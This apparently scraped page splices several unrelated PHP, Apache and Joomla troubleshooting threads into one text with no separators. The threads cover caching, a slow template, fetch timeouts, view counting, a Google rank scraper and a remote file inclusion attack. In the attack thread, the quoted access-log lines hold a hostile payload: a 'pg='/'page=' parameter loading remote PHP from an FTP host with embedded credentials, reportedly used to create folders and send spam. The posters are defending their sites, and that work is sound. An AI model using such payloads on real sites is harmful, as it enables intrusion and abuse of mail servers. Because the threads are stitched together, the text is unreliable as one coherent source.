We're having strange behavior on our linux server. Here are some symptoms:
1) PHP using old information when processing scripts:
For example: I loaded up the site today and it ran the mobile version of our Joomla 2.5.9 template instead of the normal template. I looked through the access log and two minutes before I loaded the site up an iPhone had accessed the site. So, for some reason the PHP code ‘thought’ that my access was still the iPhone. Here’s a snip from the access log.
74.45.141.88 - - [01/Mar/2013:07:39:24 -0800] "GET / HTTP/1.1" 200 9771 "https://m.facebook.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B141 [FBAN/FBIOS;FBAV/5.5;FBBV/123337;FBDV/iPhone2,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1;FBSS/1; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/0]"
...
63.224.42.234 - - [01/Mar/2013:07:43:45 -0800] "GET / HTTP/1.1" 200 9771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
2) Links on the site are sometimes being generated within Joomla differently: sometimes "ww.sitename.com" or just "sitename.com" when it should be "www.sitename.com".
3) When I make a configuration change to the site (within Joomla administration), it doesn't always take effect immediately, though it should. For instance, when I unpublish something using the user interface, it will still show as published for quite a while afterward. During a problem like this, I have tried restarting both Apache and MySQL, and it didn't help; I had to wait until something updated. Eventually it does update.
4) The PHP session doesn't work consistently. We have code that generates a captcha from a session variable. The code sometimes fails, rendering the captcha inoperable.
All of the above is totally inconsistent: sometimes it wigs out, other times it doesn't. Also, note that the site works totally fine on dev.sitename.com. We even tried switching the Apache webserver configuration from dev.sitename.com over to sitename.com, and the problem still persists.
Thank you.
I had a similar problem with the Magento CMS; in my case the cause was the cache used by Magento. Disabling the caching functionality solved the problem.
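For Joomla, the equivalent thing to check is the global cache setting in configuration.php. Below is a minimal illustration using the stock Joomla JConfig property names (the values shown are examples, not your actual settings):

<?php
// configuration.php (excerpt) -- stock Joomla property names; values are examples
class JConfig {
    public $caching = 0;            // 0 disables the global page/view cache
    public $cache_handler = 'file'; // where cached output is stored
    public $cachetime = 15;         // cache lifetime in minutes
}

A stale full-page cache that isn't keyed on the user agent would be consistent with symptom 1: the iPhone visit primes the cache, and the next visitor is served the mobile markup.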
I have a persistent problem on one of my Joomla 3.0.3 websites. The script always delays for about 31 seconds between "afterDispatch" and "beforeRenderModule", before the first module in the render list.
Other websites on my server run fine
The issue is not module-related: unpublishing the first module just shifts the delay to the next module in the list.
The issue seems to be template specific, replacing the template index.php with a standard "Hello world" index.php brings the page up immediately, as does switching to another template.
Deactivating js in chrome devtools does not affect the load time, still slow (I also selectively deleted all the script links that were called in the template index.php to no effect).
I am at a loss as to what is causing the issue. I tried PHP debugging by inserting a PHP function
function debug_to_console($data) {
    $output = $data;
    if (is_array($output)) {
        $output = implode(',', $output);
    }
    $date = date('m/d/Y h:i:s a', time());
    echo "<script>console.log('Debug Objects: " . $output . " " . $date . "');</script>";
}
at the head of the file and inserting
debug_to_console("Introduced break point:");
at break points, but merely inserting the function, without the subsequent break-point calls, causes the browser to display only "Break point" and nothing else in the browser window (not the console) immediately. This is making it hard to debug the script.
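One alternative worth trying (a sketch, not from the original post): write timestamps to the PHP error log instead of echoing <script> tags, since echoing into the page mid-render can itself corrupt the output and shows nothing until the response is flushed.

<?php
// Hypothetical helper: log a label plus a high-resolution timestamp to the
// PHP error log, so a 31-second gap between two calls is easy to spot.
function debug_to_log($label)
{
    error_log(sprintf('[%.4f] %s', microtime(true), $label));
}

debug_to_log('afterDispatch reached');
debug_to_log('before first module render');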
Any ideas? The website used to run fine. I am loath to update PHP because that might affect my other websites, which all work fine.
Here is some system info:
PHP Built On Linux inbound-smtp.eu-west-1.amazonaws.com. X.X.XX-XX.XX.amzn1.x86_64 #1 SMP Fri Dec 30 19:11:28 UTC 2016 x86_64
Database Version 5.5.52 Database Collation utf8_general_ci
PHP Version 5.6.28
Web Server Apache/2.4.23 (Amazon) OpenSSL/1.0.1k-fips PHP/5.6.28
WebServer to PHP Interface apache2handler
Joomla! Version Joomla! 3.0.3 Stable [ Ember ] 04-February-2013 14:00 GMT
Joomla! Platform Version Joomla Platform 12.2.0 Stable [ Neil Armstrong ] 21-September-2012 00:00 GMT
User Agent Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
(I changed some numbers to Xs in the first line.)
I have a few servers that fetch images from other sites.
After working for months, Apache started crashing every few hours (see config at the bottom of the post).
Investigation using logging in the code shows that file_get_contents sometimes hangs, keeping the Apache process in the W state forever. Sample URL of a fetched file that hung: https://www.mxstore.com.au/assets/thumb/3104041-c.jpg
I have set timeouts in three locations, and still the Apache process hangs forever:
set_time_limit(10);
ini_set('default_socket_timeout', 10);
And also in the context (see timeout=>3) :
$opts = array('http' => array(
    'header'  => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",
    'timeout' => 3
));
$context = stream_context_create($opts);
$data = file_get_contents($product['p_img'], false, $context, -1, 1500000);
How can I either make timeout work and/or understand why the image is not fetched?
Config:
PHP Version 5.5.9-1ubuntu4.19
Apache/2.4.7 (Ubuntu)
Apache API Version 20120211
Unfortunately, all my searches didn't yield a solution, so I implemented cURL for the calls.
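A cURL version of the fetch might look like the sketch below, under the same assumptions as the original code ($product['p_img'] holds the image URL). Unlike the stream timeout, which applies per read and so can be reset by a server that trickles data, CURLOPT_TIMEOUT puts a hard cap on the entire transfer:

<?php
// Sketch of a cURL-based fetch with enforced timeouts. Assumes $product['p_img']
// holds the image URL, as in the original file_get_contents() call.
function fetch_image($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body instead of printing it
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);    // max seconds to establish the connection
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);          // hard cap on the entire transfer
    curl_setopt($ch, CURLOPT_USERAGENT,
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0');
    $data = curl_exec($ch);                         // false on failure or timeout
    curl_close($ch);
    return $data;
}

$data = fetch_image($product['p_img']);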
I'm facing a big problem and I can't find the cause. I have a website running in apache in port 80 with ftp access.
Some user is creating FTP folders using malicious commands. I analysed the Apache log and found the following strange lines:
[08/Jul/2016:22:54:09 -0300] "POST /index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&action=upload&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/ HTTP/1.1" 200 18391 "http://mywebsite/index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
In my FTP the following folder was created: /public_html/Cliente
I have a piece in my code that uses $_GET['pg'], see:
$pg = isset($_GET['pg']) ? $_GET['pg'] : null;
$pg = htmlspecialchars($pg, ENT_QUOTES);
I tried testing the command "pg=ftp://zkeliai..." like the hacker did, but nothing happened, which is what I expected. I'm very confused about how the hacker created a folder on my FTP.
Without knowing what $pg is being used for, it's not really possible to tell what the hacker is doing, but it looks like he sent a POST request to index.php with the parameters
?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/
The effect of your sanitisation with htmlspecialchars is to convert the one & in the string to &amp;. When the request is processed by index.php, however, it will be converted back to & in an internal string, as PHP will assume it was just URL-encoded; so when index.php sends its server-side request to Thumbr.php, the & is present and serves to pass parameters to the FTP script.
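If index.php really does pass $pg to include(), the standard fix is a whitelist rather than escaping. A sketch, where the page names and the pages/ directory are hypothetical:

<?php
// Hypothetical whitelist fix -- page names and directory are examples only.
$allowed = array('home', 'cliente', 'contato');

$pg = isset($_GET['pg']) ? $_GET['pg'] : 'home';
if (!in_array($pg, $allowed, true)) {
    $pg = 'home'; // reject anything not on the list, including ftp:// URLs
}
include __DIR__ . '/pages/' . $pg . '.php';

Note that htmlspecialchars() protects HTML output, not include paths, so by itself it cannot stop this kind of injection.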
We had a similar issue on our university's site. We have had over 2200 hits in the last few days from this IP, using two different .php pages: showcase.php and Thumbr.php.
Here's a snippet from our log
POST /navigator/index.php page=ftp://zkeliai:zkeliai#zkeliai.lt/zkeliai/showcase.php? 80 - 177.125.20.3 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 11154
This page was used to send spam through our SMTP server. The page= GET parameter in the URL was being loaded by our PHP page with no filtering on the value. The showcase.php page (no longer on the FTP site) was a simple HTML form with a field for a subject, a field for HTML body contents, and a text area for email recipients.
Without being sure what was posted, it seems that loading the FTP page (with the included credentials) into PHP via the $_GET[] value managed to execute the content of that page. I'm unclear as to how that works, but that seems to be what happened.
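For what it's worth, executing a remote URL through include() is only possible when PHP's remote-include settings are enabled. These are real ini directives you can inspect (they can only be changed in php.ini, not at runtime):

<?php
// Check the two settings that make ftp:// or http:// includes possible.
var_dump(ini_get('allow_url_fopen'));   // remote streams in file functions and include
var_dump(ini_get('allow_url_include')); // remote code in include/require -- Off by default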
I have JWplayer installed on my website and would like to record and store the number of views my videos get.
I already have all the JavaScript and AJAX code needed to store data in my database after someone hits play. However, I feel that incrementing a number in the database every single time someone plays a video is inefficient.
What would be the best most efficient method to solve this problem?
Thanks.
I asked a similar question several months ago, but it related to ads. I wanted to know the best way to track ad renders so I could bill clients accurately. The response I got was to use access logs. So I ended up writing a parser to extract all the ad hits from the server log and import them into a table for report viewing.
Something to look out for if you are going to use access logs as the source for tracking this type of information: logrotate. Make sure you are pulling the data out before logrotate overwrites a log file. I'm not really a systems guy, but I set up my logrotate so that every day at midnight the day's log file gets moved to a new location.
Another benefit of access logs is if a client (or anyone) questions your numbers you can refer back to the source log file and demonstrate that your numbers are not inflated.
-- Edit --
Example of access log entry:
# If you can extrapolate videos from your path, then your parser has something to
# hook into (videos in path), and you're done
127.0.0.1 - - [08/Dec/2011:22:47:25 +0000] "GET /path/to/your/videos/video1.wmv HTTP/1.0" 200 57530 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2"
# Or, you could append a flag to the video url, and have your parser hook into the flag
# for this example 'videoPlayed'
127.0.0.1 - - [08/Dec/2011:22:47:25 +0000] "GET /path/to/your/videos/video1.wmv?videoPlayed=1 HTTP/1.0" 200 57530 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2"
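A minimal parser along those lines might look like the sketch below. It keys on the videoPlayed=1 flag from the second example entry; the log path and URL pattern are assumptions to adjust for your own setup:

<?php
// Sketch: count plays per video by scanning an access log for the
// videoPlayed=1 flag. Log path and URL prefix are assumptions.
$counts = array();
$fh = fopen('/var/log/apache2/access.log', 'r');
if ($fh) {
    while (($line = fgets($fh)) !== false) {
        if (preg_match('#"GET (/path/to/your/videos/[^ ?"]+)\?videoPlayed=1#', $line, $m)) {
            $video = basename($m[1]);
            $counts[$video] = isset($counts[$video]) ? $counts[$video] + 1 : 1;
        }
    }
    fclose($fh);
}
print_r($counts); // e.g. Array ( [video1.wmv] => 42 )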
I have written a PHP script based on a piece of code I found using Google. Its purpose is to check a particular site's position in Google for a given keyword. First, it prepares an appropriate URL to query Google (something like "http://www.google.com/search?q=the+keyword&ie=utf-8&oe=utf-8&num=50"), then it downloads the source of the page located at that URL. After that, it counts the position using regular expressions and knowledge of which div classes Google uses for results.
The script works fine when the URL I want to download from is in the domain google.com. But since it's intended to check positions for Polish users, I would like it to use google.pl. I wouldn't care, but the search results can really vary between the two (even more than 100 positions of difference). Unfortunately, when I try to use the .pl domain, cURL just doesn't return anything (it waits for the timeout first). However, when I ran my script on another server, it worked perfectly on both the google.com and google.pl domains. Do you have any idea why something like this can happen? Is there a possibility that my server was banned from querying the google.pl domain?
Here, my cURL code:
private function cURL($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    return curl_exec($ch);
    curl_close($ch);
}
First of all, I cannot reproduce your problem. I used the following 3 cURL commands to simulate your situation:
curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.5 (KHTML, like Gecko) Version/5.1 Safari/534.51.3" http://www.google.com/search?q=the+keyword
curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.5 (KHTML, like Gecko) Version/5.1 Safari/534.51.3" http://www.google.pl/search?q=the+keyword
curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.5 (KHTML, like Gecko) Version/5.1 Safari/534.51.3" http://www.google.nl/search?q=the+keyword
The first one is .com, because this should work as your reference point. Positive.
The second one is .pl, because this is where you are encountering problems. This also just works for me.
The third one is .nl, because this is where I live (so basically what's .pl for you). This too just works for me.
I'm not sure, but this could be one possible explanation:
Google.com is international; when I enter something at google.nl, for example, I still go to google.com/search?q=... (the only difference is an additional lang param).
Since google.nl/search?q=... redirects (302) to google.com, its actual body is empty.
I don't know for sure, but it is possible cURL isn't following that redirect, or you need to set an additional flag.
If this is true (which I'll check now), you need to use google.com as the domain and add the lang param, instead of using google.pl.
The reason your other server does the trick could be that cURL's configuration varies, or that the cURL version isn't the same.
Also, Google blocks cURL's default user-agent string, so I'd also suggest changing it to something like:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.5 (KHTML, like Gecko) Version/5.1 Safari/534.51.3
This has nothing to do with the problems you're encountering, but you don't actually close your cURL socket, since you return before you close it (everything after the return will be skipped).
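Putting those suggestions together, the question's method might be rewritten as the sketch below (follow the redirect, set a browser user-agent, close the handle before returning; written here as a standalone function):

<?php
// Sketch combining the suggestions above: follow redirects, send a browser
// user-agent, and close the handle before returning the result.
function fetchUrl($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // follow the 302 to google.com
    curl_setopt($ch, CURLOPT_USERAGENT,
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.5 (KHTML, like Gecko) Version/5.1 Safari/534.51.3');
    $result = curl_exec($ch);
    curl_close($ch); // now the socket is actually released
    return $result;
}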